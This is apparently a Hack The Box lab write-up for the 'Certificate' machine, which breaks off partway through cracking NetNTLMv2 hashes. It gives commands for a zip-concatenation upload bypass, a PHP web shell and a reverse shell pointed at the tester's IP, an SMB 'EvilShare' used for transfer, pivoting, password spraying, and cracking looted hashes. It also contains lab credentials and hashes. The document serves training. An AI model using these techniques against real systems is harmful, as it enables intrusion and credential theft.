Owned Certificate from Hack The Box!
I have just owned machine Certificate from Hack The Box
Hack The Box
Nmap Results
# Nmap 7.95 scan initiated Mon Jun 2 13:23:46 2025 as: /usr/lib/nmap/nmap -Pn -p- --min-rate 2000 -sC -sV -oN nmap-scan.txt 10.129.89.103
Nmap scan report for 10.129.89.103
Host is up (0.016s latency).
Not shown: 65514 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.0.30)
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
|_http-title: Did not follow redirect to http://certificate.htb/
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-06-03 01:24:58Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-03T01:26:27+00:00; +7h59m59s from scanner time.
| ssl-cert: Subject: commonName=DC01.certificate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certificate.htb
| Not valid before: 2024-11-04T03:14:54
|_Not valid after: 2025-11-04T03:14:54
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-03T01:26:27+00:00; +7h59m59s from scanner time.
| ssl-cert: Subject: commonName=DC01.certificate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certificate.htb
| Not valid before: 2024-11-04T03:14:54
|_Not valid after: 2025-11-04T03:14:54
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-03T01:26:27+00:00; +7h59m59s from scanner time.
| ssl-cert: Subject: commonName=DC01.certificate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certificate.htb
| Not valid before: 2024-11-04T03:14:54
|_Not valid after: 2025-11-04T03:14:54
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-03T01:26:27+00:00; +7h59m59s from scanner time.
| ssl-cert: Subject: commonName=DC01.certificate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certificate.htb
| Not valid before: 2024-11-04T03:14:54
|_Not valid after: 2025-11-04T03:14:54
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49666/tcp open msrpc Microsoft Windows RPC
49685/tcp open msrpc Microsoft Windows RPC
49686/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49688/tcp open msrpc Microsoft Windows RPC
49706/tcp open msrpc Microsoft Windows RPC
49722/tcp open msrpc Microsoft Windows RPC
49737/tcp open msrpc Microsoft Windows RPC
Service Info: Hosts: certificate.htb, DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-06-03T01:25:47
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: 7h59m59s, deviation: 0s, median: 7h59m58s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jun 2 13:26:28 2025 -- 1 IP address (1 host up) scanned in 161.60 secondsMy CTF Methodology
In this post, I examine the steps I take to approach a typical CTF in the form of a vulnerable target (also known as boot2root), and elaborate on steps at each phase.
0xBEN
💡
Don't miss an opportunity to find some breadcrumbs and interesting information in the initial
nmap scan output. We can see references to the certificate.htb domain as well as the DC01 hostname in the output of multiple protocols. So, let's add that to our /etc/hosts file.echo -e '10.129.89.103\t\tDC01.certificate.htb certificate.htb' | sudo tee -a /etc/hostsService Enumeration
TCP/53
TCP/389
TCP/445
smbclient -N -L //DC01.certificate.htb
TCP/88
Kerberos Pre-Auth User... | 0xBEN | Notes
How it Works
We can send a request for a TGT --- without a pre-authentication hash --- to the Kerbe…
First, I use the word list from option A and I notice they seem to have a first.l username convention. So, I alter the script in option D to output usernames in that format and enumerate again.
kerbrute userenum -d certificate.htb \
--dc DC01.certificate.htb -t 200 \
-o kerbrute.log ./kerberos_users.txt
AS-REP Roasting | 0xBEN | Notes
AS-REP Roasting
If Kerberos pre-authentication is disabled on a user account in Active Directory, t…
TCP/80
Walking the Application
Walking the “happy path” · Pwning OWASP Juice Shop
Björn Kimminich
ℹ️
We don't know anything about the web application at the moment, so for now, we'll just click around on the page; testing different links and putting expected inputs in any input fields. We just want to understand for now what certain things do.
💡
Since it's an Apache server and runs PHP, if we can find a bypass, we ought to be able to get code execution on the server.
✅
At this point, we've tested all of the clickable areas and input points that a normal user would be expected to use. Thus, we have concluded the initial walk of the application, and should go back and review our Burp / proxy request history as an initial first step to uncover potential findings.
Penetration Testing
What We Know So Far
Users and Roles
- We can register as both a teacher and student
- Seems to indicate different permissions tiers, features
- Teacher accounts are disabled, a bypass may exist
Potential Social Engineering
- Contact form may indicate some kind of XSS
- There is a file upload feature on courses
- Requires a
.zipfile that contains:.pdf.docx.pptx.xlsx
- Says submission will be reviewed by instructor
- May be able to use a maldoc to capture a NetNTLMv2 hash
- Requires a
Potential Injection Attacks
- Search forms don't appear to be functional
- Login form may be vulnerable to SQLi
Content Filter Bypass
- Test file upload feature with valid file and observe the behavior
- Might be able to find a bypass to upload
.phpand get code execution
Attempting to Steal NetNTLM Hash
Since the application takes a .zip submission, I thought that CVE-2025-24054 would be a good exploit for the job, but it seems that the underlying process inspecting the .zip is not explorer.exe. If I had to guess, the workflow is going to look like:
- Unzip archive
- Inspect document
So, whichever document is used in step 2 is the one that will need the payload.
GitHub - Greenwolf/ntlm_theft: A tool for generating multiple types of NTLMv2 hash theft files by Jacob Wilkin (Greenwolf)
A tool for generating multiple types of NTLMv2 hash theft files by Jacob Wilkin (Greenwolf) - Greenwolf/ntlm_theft
Greenwolf
I used this to generate a .docx to test with for now
After generating the .docx, I added it to pwn.zip and uploaded it. But, I was pleasantly surprised to find something else...
💡
Hovering over the
HERE hyperlink, you can see the file extension of the original file upload is preserved! http://certificate.htb/static/uploads/687afaf3514c41e99518f9af6a8d830b/pwn-remotetemplate.docxAttempting to Bypass File Upload Filters
Some of the tricks I tried weren't working for me:
- Changing the
Content-Typeheader in the multipart form - Appending magic bytes to a malicious PHP file in the
.ziparchive - Symbolic links in the
.ziparchive - Different file extension escaping techniques such as
%00,;, appending a., etc
Given the parameters, it has to be .zip archive, and files inside the archive have to be of type .pdf, .docx, .pptx, or .xlsx.
The web app filters on the file extension of the initial upload — .zip and filters on the MIME type of the file(s) within the zip.
Doing some research on bypassing MIME types in .zip archives, I came across the .zip concatenation technique.
WinRAR and ZIP File Exploits: This ZIP File Hack Could Let Malware Bypass Your Antivirus
WinRAR and ZIP File Exploits: This ZIP File Hack Could Let Malware Bypass Your Antivirus - Data Security - Information Security Newspaper | Hacking News
Mike Stevens
echo 'hello world' > nice.docxecho '<?php phpinfo(); ?>' > test.phpzip nice.zip nice.docxzip test.zip test.phpcat nice.zip test.zip > exploit.zipConcatenate the two .zip archives into one
.zip archive 💡
The logic here is that different
.zip parsers and extraction utilities will handle the concatenated archives differently. By putting the nice.zip first, this will cause the filter to see only the nice.docx and ignore the .php file in the second archive.
Exploit
PHP Web Shell
php-reverse-shell/src/web/simple_php_web_shell_get_v2.php at master · ivan-sincek/php-reverse-shell
PHP shells that work on Linux OS, macOS, and Windows OS. - ivan-sincek/php-reverse-shell
ivan-sincekwget https://github.com/ivan-sincek/php-reverse-shell/raw/refs/heads/master/src/web/simple_php_web_shell_get_v2.php -O webshell.phpzip pwn.zip webshell.phpcat nice.zip pwn.zip > exploit.zipUpload exploit.zip and navigate to webshell.php under the upload directory
PHP Reverse Shell
php-reverse-shell/src/reverse/php_reverse_shell.php at master · ivan-sincek/php-reverse-shell
PHP shells that work on Linux OS, macOS, and Windows OS. - ivan-sincek/php-reverse-shell
ivan-sincek
wget https://raw.githubusercontent.com/ivan-sincek/php-reverse-shell/refs/heads/master/src/reverse/php_reverse_shell.php -O rev.phpsed -i "s/Shell('127.0.0.1', 9000)/Shell('10.10.14.164', 443)/g" rev.php
Change listener iP and port to your VPN IP and desired port
zip rev.zip rev.phpcat nice.zip rev.zip > exploit.zipsudo rlwrap nc -lnvp 443Start a TCP listener, upload and navigate to rev.php in the upload directory
Post-Exploit Enumeration
Operating Environment
OS & Kernel
Host Name: DC01
OS Name: Microsoft Windows Server 2019 Datacenter
OS Version: 10.0.17763 N/A Build 17763
OS Manufacturer: Microsoft Corporation
OS Configuration: Primary Domain Controller
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00430-70398-04661-AA694
Original Install Date: 11/3/2024, 12:03:50 PM
System Boot Time: 6/5/2025, 7:35:32 PM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2445 Mhz
[02]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2445 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 11/12/2020
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory: 4,095 MB
Available Physical Memory: 2,824 MB
Virtual Memory: Max Size: 4,799 MB
Virtual Memory: Available: 3,380 MB
Virtual Memory: In Use: 1,419 MB
Page File Location(s): C:\pagefile.sys
Domain: certificate.htb
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: vmxnet3 Ethernet Adapter
Connection Name: Ethernet0
DHCP Enabled: Yes
DHCP Server: 10.129.0.1
IP address(es)
[01]: 10.129.206.23
[02]: fe80::daf:b9af:15cc:f09d
[03]: dead:beef::ee8b:460f:a6ba:984f
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
Current User
USER INFORMATION
----------------
User Name SID
===================== =============================================
certificate\xamppuser S-1-5-21-515537669-4223687196-3249690583-1130
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\BATCH Well-known group S-1-5-3 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeMachineAccountPrivilege Add workstations to domain Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
Users and Groups
Local Users
Local Groups
Domain Users
Administrator
Guest
krbtgt
Kai.X
Sara.B
John.C
Aya.W
Nya.S
Maya.K
Lion.SK
Eva.F
Ryan.K
akeder.kh
kara.m
Alex.D
karol.s
saad.m
xamppuser
Domain Groups
Administrators
Users
Guests
Print Operators
Backup Operators
Replicator
Remote Desktop Users
Network Configuration Operators
Performance Monitor Users
Performance Log Users
Distributed COM Users
IIS_IUSRS
Cryptographic Operators
Event Log Readers
Certificate Service DCOM Access
RDS Remote Access Servers
RDS Endpoint Servers
RDS Management Servers
Hyper-V Administrators
Access Control Assistance Operators
Remote Management Users
Storage Replica Administrators
Domain Computers
Domain Controllers
Schema Admins
Enterprise Admins
Cert Publishers
Domain Admins
Domain Users
Domain Guests
Group Policy Creator Owners
RAS and IAS Servers
Server Operators
Account Operators
Pre-Windows 2000 Compatible Access
Incoming Forest Trust Builders
Windows Authorization Access Group
Terminal Server License Servers
Allowed RODC Password Replication Group
Denied RODC Password Replication Group
Read-only Domain Controllers
Enterprise Read-only Domain Controllers
Cloneable Domain Controllers
Protected Users
Key Admins
Enterprise Key Admins
DnsAdmins
DnsUpdateProxy
Domain CRA Managers
Finance
HR
Marketing
Help Desk
Domain Storage Managers
Network Configurations
Network Interfaces
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : .htb
IPv6 Address. . . . . . . . . . . : dead:beef::ee8b:460f:a6ba:984f
Link-local IPv6 Address . . . . . : fe80::daf:b9af:15cc:f09d%7
IPv4 Address. . . . . . . . . . . : 10.129.206.23
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:2bb5%7
10.129.0.1
Processes and Services
Interesting Processes
Name : cmd.exe
Owner : CERTIFICATE\xamppuser
CommandLine : C:\Windows\system32\cmd.exe /K C:\xampp\apache_start.bat
Name : cmd.exe
Owner : CERTIFICATE\xamppuser
CommandLine : C:\Windows\system32\cmd.exe /K C:\xampp\mysql_start.bat
Name : mysqld.exe
Owner : CERTIFICATE\xamppuser
CommandLine : mysql\bin\mysqld --defaults-file=mysql\bin\my.ini --standalone
Scheduled Tasks
Interesting Scheduled Tasks
TaskName : Start Web App
User : xamppuser
Action : "C:\Program Files\Automation Scripts\start-webapp.bat"
Interesting Files
C:\xampp\htdocs\certificate.htb\db.php
<?php
// Database connection using PDO
try {
$dsn = 'mysql:host=localhost;dbname=Certificate_WEBAPP_DB;charset=utf8mb4';
$db_user = 'certificate_webapp_user'; // Change to your DB username
$db_passwd = 'cert!f!c@teDBPWD'; // Change to your DB password
$options = [
PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
PDO::ATTR_DEFAULT_FETCH_MODE => PDO::FETCH_ASSOC,
];
$pdo = new PDO($dsn, $db_user, $db_passwd, $options);
} catch (PDOException $e) {
die('Database connection failed: ' . $e->getMessage());
}
?>
Privilege Escalation
Exploring MySQL
We found a database credential in the db.php file. I tried spraying the password with nxc along with the list of users collected from the domain, but no valid credential was found. So, we'll need to use some port forwarding to reach tcp/3306 on the target.
Port Forwarding
Pivoting with Ligolo-ng | 0xBEN | Notes
Project GitHub
https://github.com/nicocha30/ligolo-ng Download Binaries
https://github.com/nico…
We need to transfer agent.exe to the target. For this purpose, the impacket-smbserver method will work just fine.
SMB | 0xBEN | Notes
SMB Server on Attack Box
For this, we can use Impacket’s smbserver.py script to run an ad-hoc SMB s…
- Start
impacket-smbserverwith credentials - Map the SMB server on the target
- Transfer Ligolo-ng
agent.exebinary - Start Ligolo proxy on Kali
- Execute Ligolo agent on the Windows client
sudo impacket-smbserver -smb2support -username 'secretuser' -password 'secretpass' EvilShare $PWDnet use Z: \\10.10.14.164\EvilShare /user:secretuser 'secretpass'Map the SMB share to drive Z:
Copy-Item Z:\agent.exe $env:USERPROFILECopy the Chisel binary to the target
cd $env:USERPROFILEsudo ./proxy -selfcert --selfcert-domain pwnz -laddr 10.10.14.164:443Start the Ligolo proxy
Start-Job -ScriptBlock { C:\Users\xamppuser\agent.exe -accept-fingerprint 4F439D961D8BABA4F771C9136FE708FB51C3FBF784F3A34538FDD18BDC639158 -connect 10.10.14.164:443 }
Connect the agent to the proxy via background job
sudo ip route add 240.0.0.1/32 dev ligoloAdd a route to access ports bound locally on the target
Connect to the DBMS
mysql --skip-ssl -h 240.0.0.1 -u 'certificate_webapp_user' -p'cert!f!c@teDBPWD'
Connect to the database through the Ligolo tunnel
MariaDB [certificate_webapp_db]> show databases;MariaDB [certificate_webapp_db]> use certificate_webapp_db;MariaDB [certificate_webapp_db]> show tables;
MariaDB [certificate_webapp_db]> select * from users;
sara.b is the admin and is a domain user, so let's try and crack the hash.Crack the Hash
echo '$2y$04$CgDe/Thzw/Em/M4SkmXNbu0YdFo6uUs3nB.pzQPV.g8UdXikZNdH6' > hashjohn --wordlist=~/Pentest/WordLists/rockyou.txt --fork=4 hash
nxc smb DC01.certificate.htb -d certificate.htb -u ad_users.txt -p 'Blink182' --continue-on-success
LdapDomainDump
ldapdomaindump -u 'CERTIFICATE.HTB\sara.b' -p 'Blink182' -o ldd DC01.certificate.htbopen ldd/domain_users_by_group.html
BloodHound
Run SharpHound on the Target
We need to transfer the SharpHound.exe collector to the target. For this purpose, we can use the SMB server mapping from before in our reverse shell.
- Transfer SharpHound collector in a
.ziparchive - Unzip on the target and run the collector
- Transfer the data back to Kali via SMB
zip -r sharphound.zip /usr/share/sharphoundCopy-Item Z:\sharphound.zip $env:USERPROFILECopy the .zip archive to the target
cd $env:USERPROFILEExpand-Archive $env:USERPROFILE\sharphound.zipUnzip the archive contents
& "$env:USERPROFILE\sharphound\usr\share\sharphound\SharpHound.exe" -c AllRun the collector using PowerShell
Copy-Item .\20250605201112_BloodHound.zip Z:\Copy the .zip data from BloodHound back to Kali for analysis
Analysis of the Data
xamppuser, we see some interesting data relating to certificate enrollment
sara.b has an absolutely massive amount of permissions in the domain
Help Desk group, which has WinRM and RDP access too
GenericAll on accounts in the Domain CRA Managers group too
WinRM as Sara.B
evil-winrm -i DC01.certificate.htb -u 'sara.b' -p 'Blink182'
💡
From here, we repeat the post-exploitation enumeration process
sara.b Documents directoryThe workstation 01 is not able to open the "Reports" smb shared folder which is hosted on DC01.
When a user tries to input bad credentials, it returns bad credentials error.
But when a user provides valid credentials the file explorer freezes and then crashes!description.txt
PCAP Analysis
Open the PCAP with Wireshark. It is currently saved in format PCAPNG, so go to File > Save As and save it in PCAP format, so we can analyze it with NetworkMiner.
Administrator user on WS-01
Extracting Secrets fro... | 0xBEN | Notes
PCAP Analysis
Kerberos AS-REQ Pre-Auth Hashes Note the existence of KRB5 protocol traffic on tcp…
Attempt to Crack Hashes
$NETNTLMv2$WS-01$0F18018782D74F81$3FF29BA4B51E86ED1065C438B6713F28$01010000000000000588E3DA922EDB012A49D5AAA4EEEA0C00000000020016004300450052005400490046004900430041005400450001000800440043003000310004001E00630065007200740069006600690063006100740065002E006800740062000300280044004300300031002E00630065007200740069006600690063006100740065002E0068007400620005001E00630065007200740069006600690063006100740065002E00680074006200070008000588E3DA922EDB0106000400020000000800300030000000000000000000000000300000DC8F08A3FCED11BE77C988C86F35837E8EC242F6F5E1D65EC5247E3A87D8FE580A001000000000000000000000000000000000000900120063006900660073002F0044004300300031000000000000000000
$NETNTLMv2$WS-01$3DB684FDE8A4436C$76BA3B94054956325448475EAB7103B9$010100000000000069CFF1DA922EDB0159C89DCA95B2D6B200000000020016004300450052005400490046004900430041005400450001000800440043003000310004001E00630065007200740069006600690063006100740065002E006800740062000300280044004300300031002E00630065007200740069006600690063006100740065002E0068007400620005001E00630065007200740069006600690063006100740065002E006800740062000700080069CFF1DA922EDB0106000400020000000800300030000000000000000000000000300000DC8F08A3FCED11BE77C988C86F35837E8EC242F6F5E1D65EC5247E3A87D8FE580A001000000000000000000000000000000000000900120063006900660073002F0044004300300031000000000000000000
$NETNTLMv2$WS-01$3F393BEA788F9272$00397DBCBA8C0F98B1FE094764B5150F$01010000000000004FF9ECDA922EDB01EFEBFCFCD00793ED00000000020016004300450052005400490046004900430041005400450001000800440043003000310004001E00630065007200740069006600690063006100740065002E006800740062000300280044004300300031002E00630065007200740069006600690063006100740065002E0068007400620005001E00630065007200740069006600690063006100740065002E00680074006200070008004FF9ECDA922EDB0106000400020000000800300030000000000000000000000000300000DC8F08A3FCED11BE77C988C86F35837E8EC242F6F5E1D65EC5247E3A87D8FE580A001000000000000000000000000000000000000900120063006900660073002F0044004300300031000000000000000000
$NETNTLMv2$WS-01$400E8B1170665503$11DD8C3BC3FFCF24690823379268A9DD$01010000000000008276FBDA922EDB01E23D922A5DCC2D6100000000020016004300450052005400490046004900430041005400450001000800440043003000310004001E00630065007200740069006600690063006100740065002E006800740062000300280044004300300031002E00630065007200740069006600690063006100740065002E0068007400620005001E00630065007200740069006600690063006100740065002E00680074006200070008008276FBDA922EDB0106000400020000000800300030000000000000000000000000300000DC8F08A3FCED11BE77C988C86F35837E8EC242F6F5E1D65EC5247E3A87D8FE580A001000000000000000000000000000000000000900120063006900660073002F0044004300300031000000000000000000
$NETNTLMv2$WS-01$415D7CB9D106E31C$CC7ADCFFAEA628997E214927F5187619$01010000000000001574F6DA922EDB014D2184A5C2FFA38D00000000020016004300450052005400490046004900430041005400450001000800440043003000310004001E00630065007200740069006600690063006100740065002E006800740062000300280044004300300031002E00630065007200740069006600690063006100740065002E0068007400620005001E00630065007200740069006600690063006100740065002E00680074006200070008001574F6DA922EDB0106000400020000000800300030000000000000000000000000300000DC8F08A3FCED11BE77C988C86F35837E8EC242F6F5E1D65EC5247E3A87D8FE580A001000000000000000000000000000000000000900120063006900660073002F0044004300300031000000000000000000
$NETNTLMv2$WS-01$4AF2949270E91BD0$E6FC561114128A4F849EDB6268C419FA$01010000000000001045E8DA922EDB01623CA486AF73EB7100000000020016004300450052005400490046004900430041005400450001000800440043003000310004001E00630065007200740069006600690063006100740065002E006800740062000300280044004300300031002E00630065007200740069006600690063006100740065002E0068007400620005001E00630065007200740069006600690063006100740065002E00680074006200070008001045E8DA922EDB0106000400020000000800300030000000000000000000000000300000DC8F08A3FCED11BE77C988C86F35837E8EC242F6F5E1D65EC5247E3A87D8FE580A001000000000000000000000000000000000000900120063006900660073002F0044004300300031000000000000000000
$NETNTLMv2$WS-01$532AE6CD16799423$E336CEAEFD01EB90006495D8B134391D$0101000000000000381D00DB922EDB01A391E84FD1BAEC8400000000020016004300450052005400490046004900430041005400450001000800440043003000310004001E00630065007200740069006600690063006100740065002E006800740062000300280044004300300031002E00630065007200740069006600690063006100740065002E0068007400620005001E00630065007200740069006600690063006100740065002E0068007400620007000800381D00DB922EDB0106000400020000000800300030000000000000000000000000300000DC8F08A3FCED11BE77C988C86F35837E8EC242F6F5E1D65EC5247E3A87D8FE580A001000000000000000000000000000000000000900120063006900660073002F0044004300300031000000000000000000
$NETNTLMv2$WS-01$83FDD536411529A9$62DF4CA11ED71A42160F302757A33164$010100000000000069CFF1DA922EDB01A9D678F5EF1826DD00000000020016004300450052005400490046004900430041005400450001000800440043003000310004001E00630065007200740069006600690063006100740065002E006800740062000300280044004300300031002E00630065007200740069006600690063006100740065002E0068007400620005001E00630065007200740069006600690063006100740065002E006800740062000700080069CFF1DA922EDB0106000400020000000800300030000000000000000000000000300000DC8F08A3FCED11BE77C988C86F35837E8EC242F6F5E1D65EC5247E3A87D8FE580A001000000000000000000000000000000000000900120063006900660073002F0044004300300031000000000000000000
$NETNTLMv2$WS-01$8CB41D220C074A8A$2D866CDC9C0A704AACAED7535FC035BD$01010000000000008276FBDA922EDB0197C6B1F68BC60B9A00000000020016004300450052005400490046004900430041005400450001000800440043003000310004001E00630065007200740069006600690063006100740065002E006800740062000300280044004300300031002E00630065007200740069006600690063006100740065002E0068007400620005001E00630065007200740069006600690063006100740065002E00680074006200070008008276FBDA922EDB0106000400020000000800300030000000000000000000000000300000DC8F08A3FCED11BE77C988C86F35837E8EC242F6F5E1D65EC5247E3A87D8FE580A001000000000000000000000000000000000000900120063006900660073002F0044004300300031000000000000000000
$NETNTLMv2$WS-01$91FD3E77B0EFA480$A6AA5CBFCCC0BA083299EE232ECD62E4$0101000000000000365AEFDA922EDB0195842A844F06E76C00000000020016004300450052005400490046004900430041005400450001000800440043003000310004001E00630065007200740069006600690063006100740065002E006800740062000300280044004300300031002E00630065007200740069006600690063006100740065002E0068007400620005001E00630065007200740069006600690063006100740065002E0068007400620007000800365AEFDA922EDB0106000400020000000800300030000000000000000000000000300000DC8F08A3FCED11BE77C988C86F35837E8EC242F6F5E1D65EC5247E3A87D8FE580A001000000000000000000000000000000000000900120063006900660073002F0044004300300031000000000000000000
$NETNTLMv2$WS-01$A3EFCAA272B5C525$E4E7637BE854CBBB6794BA01BC093586$010100000000000015D5FDDA922EDB0121C0D03461B0781A00000000020016004300450052005400490046004900430041005400450001000800440043003000310004001E00630065007200740069006600690063006100740065002E006800740062000300280044004300300031002E00630065007200740069006600690063006100740065002E0068007400620005001E00630065007200740069006600690063006100740065002E006800740062000700080015D5FDDA922EDB0106000400020000000800300030000000000000000000000000300000DC8F08A3FCED11BE77C988C86F35837E8EC242F6F5E1D65EC5247E3A87D8FE580A001000000000000000000000000000000000000900120063006900660073002F0044004300300031000000000000000000
$NETNTLMv2$WS-01$A427C28B588692D0$967C7FF0E3EC2D0A0925C0F799289BC5$01010000000000001574F6DA922EDB0161753A08908FB27E00000000020016004300450052005400490046004900430041005400450001000800440043003000310004001E00630065007200740069006600690063006100740065002E006800740062000300280044004300300031002E00630065007200740069006600690063006100740065002E0068007400620005001E00630065007200740069006600690063006100740065002E00680074006200070008001574F6DA922EDB0106000400020000000800300030000000000000000000000000300000DC8F08A3FCED11BE77C988C86F35837E8EC242F6F5E1D65EC5247E3A87D8FE580A001000000000000000000000000000000000000900120063006900660073002F0044004300300031000000000000000000
$NETNTLMv2$WS-01$A804670F824519FE$EC51FF27D174610A47027BE033E77524$01010000000000004EDCF8DA922EDB01D659CAFBCB0B873000000000020016004300450052005400490046004900430041005400450001000800440043003000310004001E00630065007200740069006600690063006100740065002E006800740062000300280044004300300031002E00630065007200740069006600690063006100740065002E0068007400620005001E00630065007200740069006600690063006100740065002E00680074006200070008004EDCF8DA922EDB0106000400020000000800300030000000000000000000000000300000DC8F08A3FCED11BE77C988C86F35837E8EC242F6F5E1D65EC5247E3A87D8FE580A001000000000000000000000000000000000000900120063006900660073002F0044004300300031000000000000000000
$NETNTLMv2$WS-01$C1AD3286D6E4BF90$9704E7686BAF717E2CBEAF7C9AB93F29$01010000000000000F96EADA922EDB019587935820D2D23C00000000020016004300450052005400490046004900430041005400450001000800440043003000310004001E00630065007200740069006600690063006100740065002E006800740062000300280044004300300031002E00630065007200740069006600690063006100740065002E0068007400620005001E00630065007200740069006600690063006100740065002E00680074006200070008000F96EADA922EDB0106000400020000000800300030000000000000000000000000300000DC8F08A3FCED11BE77C988C86F35837E8EC242F6F5E1D65EC5247E3A87D8FE580A001000000000000000000000000000000000000900120063006900660073002F0044004300300031000000000000000000
$NETNTLMv2$WS-01$C397062B91531B1D$B70CD68BAD753C300959D45CC52C744F$0101000000000000381D00DB922EDB0169D8A9149EBA2B3200000000020016004300450052005400490046004900430041005400450001000800440043003000310004001E00630065007200740069006600690063006100740065002E006800740062000300280044004300300031002E00630065007200740069006600690063006100740065002E0068007400620005001E00630065007200740069006600690063006100740065002E0068007400620007000800381D00DB922EDB0106000400020000000800300030000000000000000000000000300000DC8F08A3FCED11BE77C988C86F35837E8EC242F6F5E1D65EC5247E3A87D8FE580A001000000000000000000000000000000000000900120063006900660073002F0044004300300031000000000000000000
$NETNTLMv2$WS-01$D527731A079068AF$A7B1DDAF533C402B77064CB4A4317750$01010000000000000F96EADA922EDB01BE7444496D7644CE00000000020016004300450052005400490046004900430041005400450001000800440043003000310004001E00630065007200740069006600690063006100740065002E006800740062000300280044004300300031002E00630065007200740069006600690063006100740065002E0068007400620005001E00630065007200740069006600690063006100740065002E00680074006200070008000F96EADA922EDB0106000400020000000800300030000000000000000000000000300000DC8F08A3FCED11BE77C988C86F35837E8EC242F6F5E1D65EC5247E3A87D8FE580A001000000000000000000000000000000000000900120063006900660073002F0044004300300031000000000000000000
$NETNTLMv2$WS-01$D6C1E2AB77B0F645$E84AAF3E57F8390D5C0E2B159EB4E298$01010000000000004FF9ECDA922EDB0154EB24317744529800000000020016004300450052005400490046004900430041005400450001000800440043003000310004001E00630065007200740069006600690063006100740065002E006800740062000300280044004300300031002E00630065007200740069006600690063006100740065002E0068007400620005001E00630065007200740069006600690063006100740065002E00680074006200070008004FF9ECDA922EDB0106000400020000000800300030000000000000000000000000300000DC8F08A3FCED11BE77C988C86F35837E8EC242F6F5E1D65EC5247E3A87D8FE580A001000000000000000000000000000000000000900120063006900660073002F0044004300300031000000000000000000
$NETNTLMv2$WS-01$DD092E0E287C2314$8855A17D42ED01009ED5B3F84B84B2E6$010100000000000015D5FDDA922EDB01C6E67BE98AAEA8E500000000020016004300450052005400490046004900430041005400450001000800440043003000310004001E00630065007200740069006600690063006100740065002E006800740062000300280044004300300031002E00630065007200740069006600690063006100740065002E0068007400620005001E00630065007200740069006600690063006100740065002E006800740062000700080015D5FDDA922EDB0106000400020000000800300030000000000000000000000000300000DC8F08A3FCED11BE77C988C86F35837E8EC242F6F5E1D65EC5247E3A87D8FE580A001000000000000000000000000000000000000900120063006900660073002F0044004300300031000000000000000000
